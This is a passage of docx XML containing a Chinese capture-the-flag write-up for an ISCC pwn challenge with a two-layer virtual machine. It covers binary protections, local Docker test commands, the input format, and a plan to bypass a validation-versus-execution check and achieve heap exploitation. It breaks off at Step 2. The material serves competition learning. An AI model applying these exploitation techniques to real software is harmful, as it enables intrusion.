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er-n0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题目结构</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击面</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序入口总览</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附件存放路径如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">iscc/附件/evm.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">压缩包提取完毕后，核心文件已被归类至本地的分析目录下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iscc/temp/evm/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── pwn</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── libc.so.6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── ld-linux-x86-64.so.2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── build_payload.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── exploit_build.py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若干</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> smoke test / instrumentation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基础安全检查属性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd iscc/temp/evm</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">file pwn libc.so.6 ld-linux-x86-64.so.2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 - &lt;&lt;'PY'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">from pwn import *</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">print(ELF('./pwn').checksec())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重要分析结果：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二进制程序</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pwn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amd64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">架构，并开启了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Canary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Partial RELRO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保护机制。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题目附件内配套提供了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">libc.so.6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ld-linux-x86-64.so.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件。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若在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">物理机上直接运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">./ld-linux-x86-64.so.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exec format error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">错误。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按照当前环境的规范，测试操作需于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pwn_ubuntu24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">容器内部进行。同时，应当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">首选题目提供的动态链接器（loader）和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，避免使用容器自身系统的底层环境。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值得注意的易错点在于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --rm --platform linux/amd64 -v "$PWD:/work" -w /work pwn_ubuntu24 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  /bin/bash -lc '/lib64/ld-linux-x86-64.so.2 --library-path . ./pwn &lt; test_exit.bin'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若采用上述命令将导致系统抛出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*** stack smashing detected ***</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报错；但若修改为以下形式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --rm --platform linux/amd64 -v "$PWD:/work" -w /work pwn_ubuntu24 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  /bin/bash -lc './ld-linux-x86-64.so.2 --library-path . ./pwn &lt; test_exit.bin; echo EXIT:$?'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则可以完美模拟该题的原始运行状态。综上所述，所有本地测试流程均需严格依赖于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">附件提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> loader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libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">环境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剖析程序的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通信流程可以发现，系统并未“直接接收</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的执行指令”，具体的读取次序如下：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率先读取外层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令集的长度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接着读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所需数据页（data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pages）的数目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开始运行指定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机器码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最终切入并唤醒内层的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引擎</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于以上逻辑，有效的攻击链路绝非“直接发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击载荷”，其正确步骤应为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">构造一个能通过校验的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">占位字节流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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在校验后把它改写成真实</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用程序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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自己完成堆利用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n37"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">详细解题过程</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n38"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析程序交互格式，认定其双层虚拟机架构特性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在此前的本地辅助分析过程中，程序的标准输入结构已被成功破解。外围虚拟机的读取形式如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;evm_code_len&gt;\n</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;evm_data_pages&gt;\n</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;raw evm code&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[optional raw data pages]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;blind_len&gt;\n</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;mode&gt;\n</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;raw blind bytes&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这其中，有关长度标识的输入均为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">十进制字符串格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，而真正的指令码与数据块则采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制输入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">整个题目初期最具误导性的设计在于，内层的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节码不接受任意数据。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行之前，存在一道合法性判定程序，它强制要求内层载荷呈现如下形态：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">13 00 00 00 13 00 00 00 13 00 00 00 ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这也对应着</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RISC-V </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">架构中循环出现的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">addi x0, x0, 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">空指令。倘若未能察觉此细节，选手极易产生误判，认为“内部虚拟机的代码受到了哈希校验限制”抑或“仅支持极小范围的内存篡改”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们通过极简的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> smoke test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证实了前述推断。本地目录中保留的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">test_exit.bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">test_exit_via_data.bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件均是依据此交互规则构建的测试用例：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd iscc/temp/evm</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --rm --platform linux/amd64 -v "$PWD:/work" -w /work pwn_ubuntu24 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  /bin/bash -lc './ld-linux-x86-64.so.2 --library-path . ./pwn &lt; test_exit.bin; echo EXIT:$?'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run --rm --platform linux/amd64 -v "$PWD:/work" -w /work pwn_ubuntu24 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  /bin/bash -lc './ld-linux-x86-64.so.2 --library-path . ./pwn &lt; test_exit_via_data.bin; echo EXIT:$?'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本地环境下的测试返回信息：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXIT:0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXIT:0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由此印证了以下结论：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针对外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通信协议的逆向完全无误；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确实能够利用手段跨越</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BlindVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“校验与运行分离”的限制并渗透至内层；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目前采用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data-page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拷贝策略起码可以保证程序稳定执行完毕并正常终止。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="header-n57"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外围</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的突破口并非标准的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> load/store </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令，而是专属操作码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x2f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合静态反汇编结果以及辅助分析文档</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
